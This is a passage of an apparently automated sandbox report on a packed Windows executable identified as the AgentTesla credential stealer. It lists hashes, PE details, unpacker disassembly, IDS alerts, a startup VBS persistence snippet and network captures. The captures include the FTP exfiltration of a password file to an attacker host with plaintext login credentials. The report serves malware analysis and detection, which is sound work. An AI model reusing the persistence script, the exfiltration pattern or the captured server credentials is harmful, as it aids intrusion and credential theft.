                                      MD5:724770FF29B37951E092F58D76FB1F3C
                                      SHA1:53893E6B730FA974093A13E8F0DC3A752C7DBC62
                                      SHA-256:29394B6EA77E5CB90DCFD62652C8C57063064BD0A6F20D3D6F33A55FD4716B2E
                                      SHA-512:FD6D24197AE6898C14EECD289FE6AEA3F30AAB1C19ADD64F277F1C6B4FCE194F47C5E941AC32CB0C436CB69FC87BC1799DD40E2C53BFC3E74FED90061DCBC79D
                                      Malicious:true
                                      Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.e.s.k.i.n.\.t.r.o.o.p.w.i.s.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Entropy (8bit):7.935089786585949
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.39%
                                      • UPX compressed Win32 Executable (30571/9) 0.30%
                                      • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      File name:LfZAz7DQzo.exe
                                      File size:615'936 bytes
                                      MD5:79129cf9382f91ab74a895cd2c5a0c7f
                                      SHA1:e1590b1a5ab3212dd35732affffb68236a2ca8b2
                                      SHA256:1e6a8f176a0d7a9bd0321b4c032153f48b244be1584137453bf1afc07ea10157
                                      SHA512:27a07feaa25f9aef7e62292a92197ffcc33a98200b21c26227afe6d0ffb658257846257321828afd332dfe360713c45462c2c65f940331cb9a33c581111e2807
                                      SSDEEP:12288:0YV6MorX7qzuC3QHO9FQVHPF51jgckYY8bj8LfBmQdGFjZUBdYay3X8F:zBXu9HGaVHjY8n8LeWdzy3c
                                      TLSH:EAD423C16BD2DC7AC0A92375C47E9D047422B871CE88377E539AF51EF83A396D80A51E
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                      File Icon

                                      Icon Hash:aaf3e3e3938382a0

                                      Static PE Info

                                      General

                                      Entrypoint:0x518070
                                      Entrypoint Section:UPX1
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x676A4D27 [Tue Dec 24 05:56:55 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:fc6683d30d9f25244a50fd5357825e79

                                      Entrypoint Preview

                                      Instruction
                                      pushad
                                      mov esi, 004C2000h
                                      lea edi, dword ptr [esi-000C1000h]
                                      push edi
                                      jmp 00007F163C6F6F0Dh
                                      nop
                                      mov al, byte ptr [esi]
                                      inc esi
                                      mov byte ptr [edi], al
                                      inc edi
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      jc 00007F163C6F6EEFh
                                      mov eax, 00000001h
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      adc eax, eax
                                      add ebx, ebx
                                      jnc 00007F163C6F6F0Dh
                                      jne 00007F163C6F6F2Ah
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      jc 00007F163C6F6F21h
                                      dec eax
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      adc eax, eax
                                      jmp 00007F163C6F6ED6h
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      adc ecx, ecx
                                      jmp 00007F163C6F6F54h
                                      xor ecx, ecx
                                      sub eax, 03h
                                      jc 00007F163C6F6F13h
                                      shl eax, 08h
                                      mov al, byte ptr [esi]
                                      inc esi
                                      xor eax, FFFFFFFFh
                                      je 00007F163C6F6F77h
                                      sar eax, 1
                                      mov ebp, eax
                                      jmp 00007F163C6F6F0Dh
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      jc 00007F163C6F6ECEh
                                      inc ecx
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      jc 00007F163C6F6EC0h
                                      add ebx, ebx
                                      jne 00007F163C6F6F09h
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      adc ecx, ecx
                                      add ebx, ebx
                                      jnc 00007F163C6F6EF1h
                                      jne 00007F163C6F6F0Bh
                                      mov ebx, dword ptr [esi]
                                      sub esi, FFFFFFFCh
                                      adc ebx, ebx
                                      jnc 00007F163C6F6EE6h
                                      add ecx, 02h
                                      cmp ebp, FFFFFB00h
                                      adc ecx, 02h
                                      lea edx, dword ptr [edi+ebp]
                                      cmp ebp, FFFFFFFCh
                                      jbe 00007F163C6F6F10h
                                      mov al, byte ptr [edx]

                                      Rich Headers

                                      Programming Language:
                                      • [ASM] VS2013 build 21005
                                      • [ C ] VS2013 build 21005
                                      • [C++] VS2013 build 21005
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [ASM] VS2013 UPD5 build 40629
                                      • [RES] VS2013 build 21005
                                      • [LNK] VS2013 UPD5 build 40629

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1589680x424.rsrc
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1190000x3f968.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x158d8c0xc.rsrc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1182540x48UPX1
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      UPX00x10000xc10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      UPX10xc20000x570000x56400cb7b922f58d960ad475a32f96ccfb12bFalse0.9872848731884057data7.935341268187339IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x1190000x400000x3fe00596339e83643315742ddb396ab76efc3False0.9207933280332681data7.882060689511055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x1195ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                      RT_ICON0x1196d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                      RT_ICON0x1198040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                      RT_ICON0x1199300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                      RT_ICON0x119c1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                      RT_ICON0x119d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                      RT_ICON0x11abf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                      RT_ICON0x11b4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                      RT_ICON0x11ba0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                      RT_ICON0x11dfb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                      RT_ICON0x11f0640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                      RT_MENU0xce4a00x50dataEnglishGreat Britain1.1375
                                      RT_STRING0xce4f00x594dataEnglishGreat Britain1.007703081232493
                                      RT_STRING0xcea840x68adataEnglishGreat Britain1.0065710872162486
                                      RT_STRING0xcf1100x490dataEnglishGreat Britain1.009417808219178
                                      RT_STRING0xcf5a00x5fcdataEnglishGreat Britain1.0071801566579635
                                      RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.984029484029484
                                      RT_STRING0xd01f80x466dataEnglishGreat Britain0.9609236234458259
                                      RT_STRING0xd06600x158COM executable for DOSEnglishGreat Britain1.0319767441860466
                                      RT_RCDATA0x11f4d00x38effdata1.0003473189974916
                                      RT_GROUP_ICON0x1583d40x76dataEnglishGreat Britain0.6610169491525424
                                      RT_GROUP_ICON0x1584500x14dataEnglishGreat Britain1.25
                                      RT_GROUP_ICON0x1584680x14dataEnglishGreat Britain1.15
                                      RT_GROUP_ICON0x1584800x14dataEnglishGreat Britain1.25
                                      RT_VERSION0x1584980xdcdataEnglishGreat Britain0.6181818181818182
                                      RT_MANIFEST0x1585780x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                      Imports

                                      DLLImport
                                      KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                      ADVAPI32.dllGetAce
                                      COMCTL32.dllImageList_Remove
                                      COMDLG32.dllGetOpenFileNameW
                                      GDI32.dllLineTo
                                      IPHLPAPI.DLLIcmpSendEcho
                                      MPR.dllWNetUseConnectionW
                                      ole32.dllCoGetObject
                                      OLEAUT32.dllVariantInit
                                      PSAPI.DLLGetProcessMemoryInfo
                                      SHELL32.dllDragFinish
                                      USER32.dllGetDC
                                      USERENV.dllLoadUserProfileW
                                      UxTheme.dllIsThemeActive
                                      VERSION.dllVerQueryValueW
                                      WININET.dllFtpOpenFileW
                                      WINMM.dlltimeGetTime
                                      WSOCK32.dllconnect

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishGreat Britain

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-01-11T05:39:50.672589+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449734162.241.62.6321TCP
                                      2025-01-11T05:39:51.076312+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449736162.241.62.6348091TCP
                                      2025-01-11T05:39:51.083573+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449736162.241.62.6348091TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 11, 2025 05:39:35.660029888 CET4973080192.168.2.4208.95.112.1
                                      Jan 11, 2025 05:39:35.668840885 CET8049730208.95.112.1192.168.2.4
                                      Jan 11, 2025 05:39:35.668914080 CET4973080192.168.2.4208.95.112.1
                                      Jan 11, 2025 05:39:35.670135021 CET4973080192.168.2.4208.95.112.1
                                      Jan 11, 2025 05:39:35.678745031 CET8049730208.95.112.1192.168.2.4
                                      Jan 11, 2025 05:39:36.139049053 CET8049730208.95.112.1192.168.2.4
                                      Jan 11, 2025 05:39:36.191548109 CET4973080192.168.2.4208.95.112.1
                                      Jan 11, 2025 05:39:37.269395113 CET4973121192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:37.274281979 CET2149731162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:37.274519920 CET4973121192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:37.299164057 CET4973121192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:37.305490017 CET2149731162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:37.305546999 CET4973121192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:47.851818085 CET4973280192.168.2.4208.95.112.1
                                      Jan 11, 2025 05:39:47.856708050 CET8049732208.95.112.1192.168.2.4
                                      Jan 11, 2025 05:39:47.856795073 CET4973280192.168.2.4208.95.112.1
                                      Jan 11, 2025 05:39:47.857142925 CET4973280192.168.2.4208.95.112.1
                                      Jan 11, 2025 05:39:47.862086058 CET8049732208.95.112.1192.168.2.4
                                      Jan 11, 2025 05:39:48.313271046 CET8049732208.95.112.1192.168.2.4
                                      Jan 11, 2025 05:39:48.363703012 CET4973280192.168.2.4208.95.112.1
                                      Jan 11, 2025 05:39:49.344405890 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:49.349673033 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:49.349786043 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:49.376144886 CET4973080192.168.2.4208.95.112.1
                                      Jan 11, 2025 05:39:49.864834070 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:49.865076065 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:49.869986057 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:49.981482029 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:49.981662035 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:49.992353916 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.192749023 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.211545944 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:50.220680952 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.325491905 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.325658083 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:50.330581903 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.439016104 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.439203024 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:50.444169044 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.552988052 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.553178072 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:50.558120966 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.666600943 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.667402983 CET4973648091192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:50.672375917 CET4809149736162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:50.672460079 CET4973648091192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:50.672589064 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:50.677520037 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:51.075978994 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:51.076312065 CET4973648091192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:51.076379061 CET4973648091192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:51.082356930 CET4809149736162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:51.083504915 CET4809149736162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:51.083573103 CET4973648091192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:51.138098955 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:39:51.204843044 CET2149734162.241.62.63192.168.2.4
                                      Jan 11, 2025 05:39:51.254070044 CET4973421192.168.2.4162.241.62.63
                                      Jan 11, 2025 05:40:39.368385077 CET4973280192.168.2.4208.95.112.1
                                      Jan 11, 2025 05:40:39.374542952 CET8049732208.95.112.1192.168.2.4
                                      Jan 11, 2025 05:40:39.374728918 CET4973280192.168.2.4208.95.112.1

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 11, 2025 05:39:35.646631956 CET5582853192.168.2.41.1.1.1
                                      Jan 11, 2025 05:39:35.653881073 CET53558281.1.1.1192.168.2.4
                                      Jan 11, 2025 05:39:36.831352949 CET5012253192.168.2.41.1.1.1
                                      Jan 11, 2025 05:39:37.265091896 CET53501221.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 11, 2025 05:39:35.646631956 CET192.168.2.41.1.1.10xce40Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Jan 11, 2025 05:39:36.831352949 CET192.168.2.41.1.1.10xe812Standard query (0)ftp.antoniomayol.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 11, 2025 05:39:35.653881073 CET1.1.1.1192.168.2.40xce40No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Jan 11, 2025 05:39:37.265091896 CET1.1.1.1192.168.2.40xe812No error (0)ftp.antoniomayol.comantoniomayol.comCNAME (Canonical name)IN (0x0001)false
                                      Jan 11, 2025 05:39:37.265091896 CET1.1.1.1192.168.2.40xe812No error (0)antoniomayol.com162.241.62.63A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • ip-api.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449730208.95.112.1807164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 11, 2025 05:39:35.670135021 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Jan 11, 2025 05:39:36.139049053 CET175INHTTP/1.1 200 OK
                                      Date: Sat, 11 Jan 2025 04:39:35 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449732208.95.112.1806164C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 11, 2025 05:39:47.857142925 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Jan 11, 2025 05:39:48.313271046 CET175INHTTP/1.1 200 OK
                                      Date: Sat, 11 Jan 2025 04:39:48 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 47
                                      X-Rl: 43
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      FTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Jan 11, 2025 05:39:49.864834070 CET2149734162.241.62.63192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:39. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:39. Server port: 21.220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:39. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Jan 11, 2025 05:39:49.865076065 CET4973421192.168.2.4162.241.62.63USER johnson@antoniomayol.com
                                      Jan 11, 2025 05:39:49.981482029 CET2149734162.241.62.63192.168.2.4331 User johnson@antoniomayol.com OK. Password required
                                      Jan 11, 2025 05:39:49.981662035 CET4973421192.168.2.4162.241.62.63PASS cMhKDQUk1{;%
                                      Jan 11, 2025 05:39:50.192749023 CET2149734162.241.62.63192.168.2.4230-OK. Current restricted directory is /
                                      230-OK. Current restricted directory is /230 31 Kbytes used (0%) - authorized: 2048000 Kb
                                      Jan 11, 2025 05:39:50.325491905 CET2149734162.241.62.63192.168.2.4504 Unknown command
                                      Jan 11, 2025 05:39:50.325658083 CET4973421192.168.2.4162.241.62.63PWD
                                      Jan 11, 2025 05:39:50.439016104 CET2149734162.241.62.63192.168.2.4257 "/" is your current location
                                      Jan 11, 2025 05:39:50.439203024 CET4973421192.168.2.4162.241.62.63TYPE I
                                      Jan 11, 2025 05:39:50.552988052 CET2149734162.241.62.63192.168.2.4200 TYPE is now 8-bit binary
                                      Jan 11, 2025 05:39:50.553178072 CET4973421192.168.2.4162.241.62.63PASV
                                      Jan 11, 2025 05:39:50.666600943 CET2149734162.241.62.63192.168.2.4227 Entering Passive Mode (162,241,62,63,187,219)
                                      Jan 11, 2025 05:39:50.672589064 CET4973421192.168.2.4162.241.62.63STOR PW_user-287400_2025_01_10_23_39_48.html
                                      Jan 11, 2025 05:39:51.075978994 CET2149734162.241.62.63192.168.2.4150 Accepted data connection
                                      Jan 11, 2025 05:39:51.204843044 CET2149734162.241.62.63192.168.2.4226-31 Kbytes used (0%) - authorized: 2048000 Kb
                                      226-31 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred
                                      226-31 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred226 0.124 seconds (measured here), 2.50 Kbytes per second

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:23:39:31
                                      Start date:10/01/2025
                                      Path:C:\Users\user\Desktop\LfZAz7DQzo.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\LfZAz7DQzo.exe"
                                      Imagebase:0xe80000
                                      File size:615'936 bytes
                                      MD5 hash:79129CF9382F91AB74A895CD2C5A0C7F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:23:39:31
                                      Start date:10/01/2025
                                      Path:C:\Users\user\AppData\Local\seskin\troopwise.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\LfZAz7DQzo.exe"
                                      Imagebase:0x550000
                                      File size:615'936 bytes
                                      MD5 hash:79129CF9382F91AB74A895CD2C5A0C7F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 71%, ReversingLabs
                                      • Detection: 62%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:23:39:32
                                      Start date:10/01/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\LfZAz7DQzo.exe"
                                      Imagebase:0x580000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:23:39:44
                                      Start date:10/01/2025
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs"
                                      Imagebase:0x7ff669ac0000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:23:39:45
                                      Start date:10/01/2025
                                      Path:C:\Users\user\AppData\Local\seskin\troopwise.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\seskin\troopwise.exe"
                                      Imagebase:0x550000
                                      File size:615'936 bytes
                                      MD5 hash:79129CF9382F91AB74A895CD2C5A0C7F
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:23:39:45
                                      Start date:10/01/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
